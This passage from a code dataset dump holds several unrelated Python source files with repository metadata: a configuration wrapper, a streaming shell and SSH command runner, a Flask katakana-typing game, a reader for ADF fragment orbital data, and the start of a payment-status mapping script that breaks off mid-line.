Configurations are used for\n other parts of the library such as application objects, however, they are\n also intended to store user-defined parameters.\n \"\"\"\n\n def __init__(self, flags: ConfigurationFlags = ConfigurationFlags.NONE):\n \"\"\"Create a configuration.\n\n Args:\n flags: Flags for changing the configuration's behaviour.\n \"\"\"\n handle = c_void_p()\n yogi_core.YOGI_ConfigurationCreate(byref(handle), flags)\n self._flags = flags\n super().__init__(handle)\n\n @property\n def flags(self) -> ConfigurationFlags:\n \"\"\"Configuration flags.\"\"\"\n return self._flags\n\n def update_from_command_line(self, argv: List[str], options: CommandLineOptions = ConfigurationFlags.NONE) -> None:\n \"\"\"Updates the configuration from command line options.\n\n If parsing the command line, files or any given JSON string fails, or\n if help is requested (e.g. by using the --help switch) then a\n DetailedFailureException will be raised containing detailed\n information about the error or the help text.\n\n Args:\n argv: List of command line arguments including the script name.\n options: Options to provide on the command line.\n \"\"\"\n args = (POINTER(c_char) * (len(argv)))()\n for i, arg in enumerate(argv):\n args[i] = create_string_buffer(arg.encode())\n\n yogi_core.YOGI_ConfigurationUpdateFromCommandLine(self._handle, len(args), args, options)\n\n def update_from_json(self, json: Union[JsonView, str, object]) -> None:\n \"\"\"Updates the configuration from a JSON object or a JSON object\n serialized to a string.\n\n If parsing fails then a DetailedFailureException will be raised\n containing detailed information about the error.\n\n Args:\n json: JsonView, serializable object or already serialized object.\n \"\"\"\n if not isinstance(json, JsonView):\n json = JsonView(json)\n\n yogi_core.YOGI_ConfigurationUpdateFromJson(self._handle, json.data.obj)\n\n def update_from_file(self, filename: str) -> None:\n \"\"\"Updates the configuration from a JSON file.\n\n If parsing the file fails then a DetailedFailureException will be\n raised containing detailed information about the error.\n\n Args:\n filename: Path to the JSON file.\n \"\"\"\n yogi_core.YOGI_ConfigurationUpdateFromFile(self._handle, filename.encode())\n\n def dump(self, *, resolve_variables: Optional[bool] = None, indentation: Optional[int] = None) -> str:\n \"\"\"Retrieves the configuration as a JSON-formatted string.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n\n Returns:\n The configuration as a JSON-formatted string.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n json = c_char_p()\n yogi_core.YOGI_ConfigurationDump(self._handle, byref(json), None, int(resolve_variables), indentation)\n return json.value.decode()\n\n def to_json(self, *, resolve_variables: Optional[bool] = None) -> Dict[str, object]:\n \"\"\"Retrieves the configuration as a JSON object.\n\n Args:\n resolve_variables: Resolve all configuration variables. 
If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n\n Returns:\n Dictionary representing the configuration.\n \"\"\"\n return json_module.loads(self.dump(resolve_variables=resolve_variables))\n\n def write_to_file(self, filename: str, *, resolve_variables: Optional[bool] = None,\n indentation: Optional[int] = None) -> None:\n \"\"\"Writes the configuration to a file in JSON format.\n\n This is useful for debugging purposes.\n\n Args:\n filename: Path to the output file.\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n yogi_core.YOGI_ConfigurationWriteToFile(self._handle, filename.encode(), int(resolve_variables), indentation)\n\n def validate(self, schema: 'Configuration', *, section: str = None) -> None:\n \"\"\"Validates the configuration against a JSON Schema.\n\n The validation is based on JSON Schema draft-07, see\n http://json-schema.org/. The schema to validate against has to be\n supplied in the schema parameter which needs to be a configuration\n object itself.\n\n If the validation fails, a DetailedFailureException with the\n CONFIGURATION_VALIDATION_FAILED error will be raised, containing a\n human-readable description about the failure.\n\n The section parameter can be used to specify a section of the\n configuration to validate instead of the whole configuration.\n\n Args:\n schema: The schema to use.\n section: Section in the configuration to validate; syntax is\n JSON pointer (RFC 6901).\n \"\"\"\n if section:\n section = section.encode()\n\n yogi_core.YOGI_ConfigurationValidate(self._handle, section, schema._handle)\n","repo_name":"yohummus/yogi-framework","sub_path":"yogi-python/yogi/_configuration.py","file_name":"_configuration.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70884293852","text":"\"\"\"\nStreaming Shell / SSH Commands.\n\nReturn Generator Objects enabling streaming output\n\n\"\"\"\nimport os\nimport subprocess\n\n\nfrom cmd_exception import ReturnCodeError\nimport ssh_conn\n\n\ndef run_cmd(command, work_dir=None):\n \"\"\"\n Run shell command with streaming output.\n\n Input:\n command - string of command to run\n work_dir - working directory\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n ReturnCodeError\n\n \"\"\"\n if work_dir is not None:\n os.chdir(work_dir) # Change to working directory\n\n # Run Command\n ps = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n\n # Read + yield stdout until process ends\n while ps.poll() is None:\n line = ps.stdout.readline()\n if line != \"\":\n yield line\n\n return_code = ps.returncode\n # Throw exception if return code is not 0\n if return_code:\n exc = \"\\nCOMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n\ndef run_cmd_list(commands, work_dir=None):\n \"\"\"\n Run a list of shell commands with streaming output.\n\n Input:\n commands - list of commands to run\n work_dir - working directory\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n 
CommandException\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n for command in commands:\n for line in run_cmd(command, work_dir):\n yield line\n\n\ndef run_ssh_cmd(host, command, work_dir=None, username=None,\n key_filename=None, _connection=None):\n \"\"\"\n Run shell command over ssh with streaming output.\n\n Input:\n host - target machine\n command - string of command to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n _connection - SSH Connection\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n # If no connection passed in create our own\n if _connection is None:\n ssh = ssh_conn.connect(host, username, key_filename)\n else:\n ssh = _connection\n\n # Handle Working Directory\n if work_dir is not None:\n command = \"cd %s && %s\" % (work_dir, command)\n\n # Run Command\n stdin, stdout, stderr = ssh.exec_command(command)\n\n while True:\n out = stdout.readline()\n # Stderr can block waiting so check to see if its ready\n if stderr.channel.recv_stderr_ready():\n out = out + stderr.readline()\n # If\n if out != \"\":\n yield out\n else:\n break\n\n return_code = stdout.channel.recv_exit_status()\n # Throw exception if return code is not 0\n if return_code:\n ssh.close() # Tidy Up\n exc = \"COMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n if _connection is None:\n ssh.close()\n\n\ndef run_ssh_cmd_list(host, commands, work_dir=None, username=None,\n key_filename=None):\n \"\"\"\n Run a list of shell commands over ssh with streaming output.\n\n Input:\n host - target machine\n commands - list of commands to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n\n ssh = ssh_conn.connect(host, username, key_filename)\n\n for command in commands:\n for line in run_ssh_cmd(host, command, work_dir, username,\n key_filename, ssh):\n yield line\n\n ssh.close()\n","repo_name":"graze/pycmd-utils","sub_path":"cmd_utils/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2112718705","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom flask import Flask, render_template, request\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport random\n\napp = Flask(__name__)\n\nMONSTER_NO_MAX=898\nIMG_SOURCE_URL='https://zukan.pokemon.co.jp/detail/'\n\nclass Monster:\n pass\n\n@app.route(\"/\")\n@app.route(\"/\", methods=['GET', 'POST'])\ndef show(id=None, mistake=False):\n if id is None: id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n\n print(id)\n url = IMG_SOURCE_URL + str(id)\n\n http = urllib3.PoolManager()\n r = http.request('GET', url)\n\n soup = BeautifulSoup(r.data, 'html.parser')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:image'})\n img_url = meta_tag[0].get('content')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:title'})\n name = meta_tag[0].get('content').split(u'|')[0].split()[0]\n def translate_kana2alphabet(kana):\n map_k2a = {u'ア':'A', u'イ':'I', u'ウ':'U', u'エ':'E', 
u'オ':'O', u'カ':'KA', u'キ':'KI',u'ク':'KU',u'ケ':'KE',u'コ':'KO',\n u'サ':'SA',u'シ':'SHI',u'ス':'SU',u'セ':'SE',u'ソ':'SO',u'タ':'TA',u'チ':'CHI',u'ツ':'TU',u'テ':'TE',u'ト':'TO',\n u'ナ':'NA',u'ニ':'NI',u'ヌ':'NU',u'ネ':'NE',u'ノ':'NO',u'ハ':'HA',u'ヒ':'HI',u'フ':'FU',u'ヘ':'HE',u'ホ':'HO',\n u'マ':'MA',u'ミ':'MI',u'ム':'MU',u'メ':'ME',u'モ':'MO',u'ヤ':'YA',u'ユ':'YU',u'ヨ':'YO',u'ワ':'WA',u'ヲ':'WO',u'ン':'NN',\n u'ラ':'RA',u'リ':'RI',u'ル':'RU',u'レ':'RE',u'ロ':'RO',\n u'ガ':'GA',u'ギ':'GI',u'グ':'GU',u'ゲ':'GE',u'ゴ':'GO',u'ザ':'ZA',u'ジ':'JI',u'ズ':'ZU',u'ゼ':'ZE',u'ゾ':'ZO',\n u'ダ':'DA',u'ヂ':'DI',u'ヅ':'DU',u'デ':'DE',u'ド':'DO',u'バ':'BA',u'ビ':'BI',u'ブ':'BU',u'ベ':'BE',u'ボ':'BO',\n u'パ':'PA', u'ピ':'PI',u'プ':'PU',u'ペ':'PE',u'ポ':'PO',u'ヴ':'VU',u'ッ':'XTU',u'ャ':'XYA',u'ュ':'XYU',u'ョ':'XYO',\n u'ァ':'XA',u'ィ':'XI',u'ゥ':'XU',u'ェ':'XE',u'ォ':'XO',\n u'ー':'-',u'・':'',u' ':' ',u'♀':'',u'♂':'',u'Z':'Z',u':': ''}\n alphabets = []\n for char in kana:\n alphabets.append(map_k2a[char])\n\n # 「ッ」の処理\n for i, alphabet in enumerate(alphabets):\n if alphabet == 'XTU': alphabets[i+1] = alphabets[i+1][0] + alphabets[i+1][:]\n\n # 「ャ」「ュ」「ョ」の処理\n # ���下、前の子音+母音でいけるもの KI XYA -> KYA\n # 「キャ」「キュ」「キョ」「シャ」「シュ」「ショ」「チャ」「チュ」「チョ」「ニャ」「ニュ」「ニョ」「ヒャ」「ヒュ」「ヒョ」\n # 「ミャ」「ミュ」「ミョ」「リャ」「リュ」「リョ」「ギャ」「ギュ」「ギョ」「ジャ」「ジュ」「ジョ」「ヂャ」「ヂュ」「ヂョ」\n # 「ビャ」「ビュ」「ビョ」「ピャ」「ピュ」「ピョ」\n for i, alphabet in enumerate(alphabets):\n if alphabet in ('XYA', 'XYU', 'XYO'): \n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][2]\n else:\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1:3]\n elif alphabet in ('XE'):\n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1]\n \n alphabets = [alphabet for alphabet in alphabets if alphabet not in ('XYA', 'XYU', 'XYO','XE', 'XTU', '')]\n print(alphabets)\n return ' '.join(alphabets)\n\n alphabets = translate_kana2alphabet(name)\n\n return render_template('index.html', id=id, img_url=img_url, name=name, alphabets=alphabets, mistake=mistake)\n\n@app.route(\"/check\", methods=['POST'])\ndef cehck():\n print(request.form.get('input'))\n input = request.form.get('input').replace(' ', '')\n name = request.form.get('alphabets').replace(' ', '')\n id = request.form.get('id')\n\n if input.lower() == name.lower():\n new_id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n return show(new_id)\n else:\n return show(id, mistake=True)\n\n@app.route(\"/search\")\ndef search():\n return render_template('search.html')\n\n@app.route(\"/test\")\ndef test():\n return render_template('test.html')\n\nif __name__ == \"__main__\":\n #app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 8080)))\n app.run(debug=True)","repo_name":"shuuuuua/typing_monsters","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27600229294","text":"\"\"\"\r\nModule containing functions for extracting SFO data from the rkf files of fragment analysis calculations.\r\nThe following terms can be extracted form the rkf files:\r\n- Overlap (in a.u.)\r\n- Orbital Energy (in eV)\r\n- Occupation (in a.u.)\r\n- Gross Populations (in a.u.)\r\n\r\nBEFORE READING FURTHER: please read the following section about the format of the rkf files:\r\nhttps://www.scm.com/doc/ADF/Appendices/TAPE21.html\r\n\r\nImportant sections together with associated variables are (format: (\"section\", \"variable\")):\r\n- \"Symmetry\", \"ncbs\" = Number of frozen cores per irrep of the complex 
calculation (could not find a better alternative for Fragment calculations)\r\n- \"SFOs\", \"fragment\" = Fragment index of the ACTIVE* SFOs\r\n- \"SFOs\", \"subspecies\" = Symmetry labels of each ACTIVE SFO (e.g. 1: \"A1\", 2: \"A1\", 3: \"A2\", 4: \"A2\", ...)\r\n- \"SFOs\", \"occupation\" = Occupations of the ACTIVE SFOs\r\n- \"SFOs\", \"escale\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are taken into account)\r\n- \"SFOs\", \"energy\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are NOT taken into account)\r\n- \"SFO popul\", \"sfo_grosspop\" = Gross populations of the SFOs (FROZEN SFOS INCLUDED!)\r\n\r\nthat can be viewed in the KF Browser of AMS (open a \"adf.rkf\" file and press \"ctrl + E\" on Windows or \"cmd + E\" on Mac).\r\n* Active SFOs are SFOs that are not frozen cores.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nfrom typing import Callable, Sequence\r\n\r\nimport numpy as np\r\nfrom scm.plams import KFFile\r\n\r\nfrom orb_analysis.custom_types import Array1D, UnrestrictedPropertyDict, SpinTypes\r\n\r\n# --------------------Helper Function(s)-------------------- #\r\n\r\n\r\ndef split_1d_array_into_dict_sorted_by_irreps(data_array: Array1D, irreps: Sequence[str], ) -> dict[str, Array1D]:\r\n \"\"\"\r\n Splits a 1D array into a dictionary of arrays based on the irreps. The irreps are the keys of the dictionary.\r\n data_array and irreps must have the same length.\r\n \"\"\"\r\n n_entries_per_irrep = [irreps.count(irrep) for irrep in set(irreps)]\r\n data_ordered_by_irrep = {irrep: np.zeros(n_entries) for irrep, n_entries in zip(set(irreps), n_entries_per_irrep)}\r\n\r\n # Now we loop over the irreps and add the data to the right array\r\n irrep_counter = {irrep: 0 for irrep in set(irreps)}\r\n for data_entry, irrep in zip(data_array, irreps):\r\n data_ordered_by_irrep[irrep][irrep_counter[irrep]] = data_entry\r\n irrep_counter[irrep] += 1\r\n return data_ordered_by_irrep\r\n\r\n\r\n# -------------------Low-level KF reading -------------------- #\r\n\r\ndef get_frag_name(kf_file: KFFile, frag_index: int) -> str:\r\n \"\"\" Returns the name of the fragment. \"\"\"\r\n frag_name_per_sfo = kf_file.read(\"SFOs\", \"fragtype\").split() # type: ignore\r\n frag_names = list(dict.fromkeys(frag_name_per_sfo))\r\n return frag_names[frag_index - 1]\r\n\r\n\r\ndef uses_symmetry(kf_file: KFFile) -> bool:\r\n \"\"\" Returns True if the complex calculation uses symmetry for its MOs and other parts such as gross populations and overlap. \"\"\"\r\n grouplabel: str = kf_file.read(\"Symmetry\", \"grouplabel\").split()[0] # type: ignore\r\n return grouplabel.lower() != \"nosym\"\r\n\r\n\r\ndef get_total_number_sfos(kf_file: KFFile) -> int:\r\n \"\"\" Returns the total number of *active* SFOs (frozen core SFOs excluded), which is the sum of the SFOs of both fragments. \"\"\"\r\n n_active_sfos = int(kf_file.read(\"SFOs\", \"number\")) # type: ignore\r\n return n_active_sfos\r\n\r\n\r\ndef get_sfo_indices_of_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[int]:\r\n \"\"\" Returns the indices of *active* SFOs belonging to one fragment. 
\"\"\"\r\n sfo_frag_indices = list(kf_file.read(\"SFOs\", \"fragment\", return_as_list=True)) # type: ignore\r\n sfo_frag_indices = [i for i, sfo_frag_index in enumerate(sfo_frag_indices) if sfo_frag_index == frag_index]\r\n return sfo_frag_indices\r\n\r\n\r\ndef get_irrep_each_sfo_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[str]:\r\n sfo_indices_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n frag_symlabels_each_sfo = list(kf_file.read(\"SFOs\", \"subspecies\").split()) # type: ignore\r\n frag_symlabels_each_sfo = [frag_symlabels_each_sfo[i] for i in sfo_indices_one_frag]\r\n return frag_symlabels_each_sfo\r\n\r\n\r\ndef get_ordered_irreps_of_one_frag(kf_file: KFFile, frag_index: int) -> list[str]:\r\n \"\"\" Returns the ordered irreps of *active* SFOs (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_frag_indices = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n all_sfo_irreps: list[str] = kf_file.read(\"SFOs\", \"subspecies\", return_as_list=True).split() # type: ignore\r\n sfo_irreps_of_one_frag = list(dict.fromkeys([all_sfo_irreps[i] for i in sfo_frag_indices]))\r\n return sfo_irreps_of_one_frag\r\n\r\n\r\ndef get_number_sfos_per_irrep_per_frag(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\" Returns the number of *active* SFOs of each irrep (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_irreps = get_irrep_each_sfo_one_frag(kf_file, frag_index=frag_index)\r\n sfo_irrep_sum = {irrep: sfo_irreps.count(irrep) for irrep in set(sfo_irreps)}\r\n return sfo_irrep_sum\r\n\r\n\r\n# --------------------Frozen Core Handling-------------------- #\r\n\r\ndef get_frozen_cores_per_irrep(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\"\r\n Reads the number of frozen cores per irrep from the KFFile.\r\n\r\n The number of frozen cores per irrep is important for getting gross populations and overlap analysis.\r\n Basically, the SFO index shown in AMSLevels is different than the index shown in the overlap and population analysis because they can be shifted by frozen cores.\r\n\r\n Moreover, if the complex calculation uses symmetry, but the fragments themselves do not, then the \"A\" irrep is added, being the sum of all frozen cores.\r\n\r\n In case there is no frozen core and no symmetry, but the fragments use symmetry, then the frozen core is 0 for all irreps that are present in the fragments.\r\n \"\"\"\r\n ordered_frag_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n n_core_orbs_per_irrep: list[int] = kf_file.read(\"Symmetry\", \"ncbs\", return_as_list=True) # type: ignore since n_core_orbs is a list of ints\r\n\r\n frozen_core_per_irrep = {irrep: n_frozen_cores for irrep, n_frozen_cores in zip(ordered_frag_irreps, n_core_orbs_per_irrep)} # type: ignore\r\n\r\n # Add the \"A\" irrep to the dictionary for the case when symmetry is not used (e.g. NoSym), but the fragments themselves use symmetry.\r\n # This is only used for the overlap analysis.\r\n if not uses_symmetry(kf_file):\r\n frozen_core_per_irrep[\"A\"] = sum(n_core_orbs_per_irrep)\r\n return frozen_core_per_irrep\r\n\r\n\r\n# --------------------Restricted Property Function(s)-------------------- #\r\n\r\ndef get_orbital_energies(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the orbital energies from the KFFile. \"\"\"\r\n # escale refers energies scaled by relativistic effects (ZORA). 
If no relativistic effects are present, \"energy\" is the appropriate key.\r\n variable = \"escale\" if (\"SFOs\", \"escale\") in kf_file else \"energy\"\r\n\r\n # It is either \"escale\" or \"escale_B\", apparently there is no \"escale_A\" key (same for \"energy\")\r\n if spin == SpinTypes.B and (\"SFOs\", f\"{variable}_{SpinTypes.B}\") in kf_file:\r\n variable = f\"{variable}_{SpinTypes.B}\"\r\n\r\n # Reads the orbital energies for both fragments and selects the data for the current fragment\r\n orb_energies = np.array(kf_file.read(\"SFOs\", variable)) # type: ignore\r\n\r\n return orb_energies\r\n\r\n\r\ndef get_occupations(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the occupations from the KFFile. \"\"\"\r\n # It is either \"occupation\" or \"occupation_B\", apparently there is no \"occupation_A\" key\r\n occupation_key = f\"occupation_{SpinTypes.B}\" if spin == SpinTypes.B and (\"SFOs\", f\"occupation_{SpinTypes.B}\") in kf_file else \"occupation\"\r\n occupations = np.array(kf_file.read(\"SFOs\", occupation_key)) # type: ignore\r\n\r\n return occupations\r\n\r\n\r\n# --------------------Unrestricted Property Function(s)-------------------- #\r\n\r\n\r\n# --------------------Property to Function Mapping-------------------- #\r\n\r\n\r\n# Format: {property: (callable function for reading property, section in KFFile, variable in KFFile)}\r\nRESTRICTED_KEY_FUNC_MAPPING: dict[str, Callable] = {\r\n \"orb_energies\": get_orbital_energies,\r\n \"occupations\": get_occupations,\r\n}\r\n\r\n# --------------------Interface Function(s)-------------------- #\r\n\r\n\r\ndef get_fragment_properties(kf_file: KFFile, frag_index: int) -> UnrestrictedPropertyDict:\r\n \"\"\"\r\n Returns a dictionary of dictionaries with the properties of the fragments.\r\n\r\n The properties are:\r\n - Orbital Energies\r\n - Occupations\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n property (\"orb_energies\" / occupations): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n\r\n Note: this will produce double the amount of data when restricted fragments are used because the spin key is not needed for restricted fragments.\r\n Currently, the \"B\" spin is discarded for restricted calcs in the `create_fragment_data` function.\r\n \"\"\"\r\n sfo_indices_of_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index)\r\n frag_irreps_each_sfo = get_irrep_each_sfo_one_frag(kf_file, frag_index)\r\n\r\n data_dic_to_be_unpacked = {property: {str(spin): {} for spin in SpinTypes} for property in RESTRICTED_KEY_FUNC_MAPPING}\r\n\r\n for property, func in RESTRICTED_KEY_FUNC_MAPPING.items():\r\n\r\n for spin in SpinTypes:\r\n\r\n data = func(kf_file, spin=spin)\r\n\r\n data = np.array([data[i] for i in sfo_indices_of_one_frag])\r\n\r\n # Now we turn one long array into a dictionary of arrays sorted by irreps (e.g. [.....] -> {\"A1\": [.....], \"A2\": [.....]})\r\n data_dic_to_be_unpacked[property][spin] = split_1d_array_into_dict_sorted_by_irreps(data_array=data, irreps=frag_irreps_each_sfo)\r\n\r\n return data_dic_to_be_unpacked\r\n\r\n\r\ndef get_gross_populations(kf_file: KFFile, frag_index: int = 1) -> dict[str, dict[str, Array1D[np.float64]]]:\r\n \"\"\"\r\n Reads the gross populations from the KFFile by taking into account the frozen cores.\r\n Annoyingly, the \"SFOs\" sections contains the SFOs of both fragments that ALREADY HAVE BEEN FILTERED for the frozen cores.\r\n For example, the SFOs number may be 114, but the gross population array may have 148 entries. 
This is because the first 34 entries are the frozen cores.\r\n\r\n Structure of the (\"SFOs popul\",\"sfo_grosspop\") section for a restricted calculation with c3v symmetry:\r\n [n Frozen Cores A1, Active SFOs Frag1 A1, Active SFOs Frag2 A1, n Frozen Cores A2, Active SFOs Frag1 A2, Active SFOs Frag2 A2, ...]\r\n\r\n Therefore, the sum of `sfo_indices_of_one_frag` and `n_frozen_cores_per_irrep` is used to get the correct indices for SFOs on both fragments and all irreps.\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n \"\"\"\r\n symmetry_used = uses_symmetry(kf_file)\r\n frags_sfo_irrep_sums = [get_number_sfos_per_irrep_per_frag(kf_file, frag_index=frag_index) for frag_index in [1, 2]]\r\n\r\n ordered_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n frozen_core_per_irrep = get_frozen_cores_per_irrep(kf_file, frag_index=frag_index)\r\n\r\n raw_gross_pop_all_sfos = np.array(kf_file.read(\"SFO popul\", \"sfo_grosspop\"))\r\n\r\n if not symmetry_used:\r\n start_index = sum(frozen_core_per_irrep.values())\r\n total_sfo_sum_frag1 = sum(frags_sfo_irrep_sums[0][irrep] for irrep in frags_sfo_irrep_sums[0])\r\n total_sfo_sum_frag2 = sum(frags_sfo_irrep_sums[1][irrep] for irrep in frags_sfo_irrep_sums[1])\r\n total_sfo_for_one_spin = total_sfo_sum_frag1 + total_sfo_sum_frag2 + start_index\r\n\r\n if frag_index == 1:\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index: start_index + total_sfo_sum_frag1]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin:total_sfo_for_one_spin + total_sfo_sum_frag1]}\r\n }\r\n\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index + total_sfo_sum_frag1: start_index + total_sfo_sum_frag1 + total_sfo_sum_frag2]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin + total_sfo_sum_frag1: total_sfo_for_one_spin + total_sfo_sum_frag1 + total_sfo_sum_frag2]}\r\n }\r\n\r\n gross_pop_active_sfos = {str(spin): {irrep: np.zeros_like(frags_sfo_irrep_sums[frag_index-1][irrep], dtype=np.float64) for irrep in frags_sfo_irrep_sums[frag_index - 1]} for spin in SpinTypes}\r\n\r\n # only works if frag1 and frag2 have the same irreps and thus belong to the same point group\r\n for spin in SpinTypes:\r\n raw_gross_pop_index = 0 if spin == SpinTypes.A else get_total_number_sfos(kf_file) + sum(frozen_core_per_irrep.values())\r\n for irrep in ordered_irreps:\r\n n_frozen_cores = frozen_core_per_irrep.get(irrep, 0)\r\n n_sfos_frag1 = frags_sfo_irrep_sums[0][irrep]\r\n n_sfos_frag2 = frags_sfo_irrep_sums[1][irrep]\r\n start_irrep_index = raw_gross_pop_index + n_frozen_cores\r\n\r\n if frag_index == 1:\r\n end_irrep_index = start_irrep_index + n_sfos_frag1\r\n else:\r\n start_irrep_index += n_sfos_frag1\r\n end_irrep_index = start_irrep_index + n_sfos_frag2\r\n\r\n gross_pop_active_sfos[spin][irrep] = raw_gross_pop_all_sfos[start_irrep_index: end_irrep_index]\r\n\r\n raw_gross_pop_index += sum(frags_sfo_irrep_sums[frag_i][irrep] for frag_i in [0, 1]) + n_frozen_cores\r\n\r\n return gross_pop_active_sfos\r\n\r\n\r\n# def main():\r\n# import pathlib as pl\r\n\r\n# current_dir = pl.Path(__file__).parent\r\n# rkf_dir = current_dir.parent.parent.parent / \"test\" / \"fixtures\" / \"rkfs\"\r\n# # rkf_file = 'restricted_largecore_differentfragsym_c4v_full.adf.rkf'\r\n# rkf_file = 'unrestricted_largecore_fragsym_c3v_full.adf.rkf'\r\n# kf_file = KFFile(str(rkf_dir / rkf_file))\r\n\r\n # print(get_orbital_energies(kf_file))\r\n\r\n # 
print(get_occupations(kf_file))\r\n # print(get_number_sfos_per_irrep_per_frag(kf_file, frag_index=1))\r\n # print(get_frag_name(kf_file, frag_index=2))\r\n # data = get_fragment_properties(kf_file, frag_index=1)\r\n # pprint(data)\r\n # grospop = get_gross_populations(kf_file, frag_index=1)\r\n # print(grospop)\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# main()\r\n","repo_name":"SiebeLeDe/orbitals","sub_path":"src/orb_analysis/orb_functions/sfo_functions.py","file_name":"sfo_functions.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10096853824","text":"import bots.transform as transform\n\n\ndef main(inn, out):\n\n # Get the original payment id from the original message Id\n original_message_id = inn.get(\n {'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'OrgnlMsgId': None})\n\n # transform.persist_add_update('message_lookup', 'MG12', 'USA65')\n # transform.persist_add_update('message_lookup', 'MG13', 'USA92')\n\n original_payment_id = transform.persist_lookup(\n 'message_lookup', original_message_id)\n\n group_status = inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'GrpSts': None})\n out.data.header = {\n 'payment_identifier': original_payment_id or original_message_id,\n 'transaction_count': inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts',\n 'OrgnlNbOfTxs': None}),\n\n 'status': transform.ccode('Payment Status', group_status, safe=True)\n }\n\n out.data.lines = []\n for pmt_inf in inn.getloop({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlPmtInfAndSts'}):\n\n for txn_inf in pmt_inf.getloop({'BOTSID': 'OrgnlPmtInfAndSts'},\n {'BOTSID': 'TxInfAndSts'}):\n\n status = txn_inf.get({'BOTSID': 'TxInfAndSts', 'TxSts': None})\n additional_status = txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf'},\n {'BOTSID': 'Rsn', 'Cd': None})\n out.data.lines.append({\n 'endtoend_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 